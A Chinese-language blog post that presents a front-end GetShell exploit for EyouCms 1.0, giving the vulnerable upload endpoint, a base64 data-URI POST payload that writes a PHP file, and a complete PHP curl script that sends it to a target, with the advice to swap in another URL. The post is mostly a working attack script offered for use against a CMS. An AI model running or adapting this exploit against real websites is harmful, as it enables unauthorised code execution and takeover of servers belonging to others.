EyouCms1.0前台GetShell+漏洞利用脚本

  • 内容
  • 相关

Poc:/index.php/api/Uploadify/preview

检测是否存在漏洞

1.png

存在漏洞,我们来GetShell

2.png

Post Data内容:data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==

内容放好执行就好了

3.png

我们访问一下

4.png

GetShell成功

附上漏洞利用脚本

<?php
//EyouCms-V1.0 
//GetShell漏洞检测  

function request_post($url = '', $param = '')
{
	if(empty($url) || empty($param))
	{
		return false;
	}
	
	$postUrl = $url;
	$curlPost = $param;
	$ch = curl_init();	//初始化curl
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);	//捕获内容,但不输出
	curl_setopt($ch, CURLOPT_URL, $postUrl);	//抓取指定网页
	curl_setopt($ch, CURLOPT_HEADER, 0);	//设置header
	curl_setopt($ch, CURLOPT_POST, 1);	//post提交方式
	curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
	$data = curl_exec($ch);	//运行curl
	$return_content = curl_multi_getcontent($ch);	//获取输出的文本流
	
	return $return_content;
}

$return_content = request_post("http://127.0.0.1/index.php/api/Uploadify/preview", "data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==");
echo $return_content;
?>
//替换request_post里面的内容即可

本文标签:

版权声明:若无特殊注明,本文皆为《南柯一梦》原创,转载请保留文章出处。

本文链接:EyouCms1.0前台GetShell+漏洞利用脚本 - https://www.nkymbk.cn/post-175.html

00:00 / 00:00
顺序播放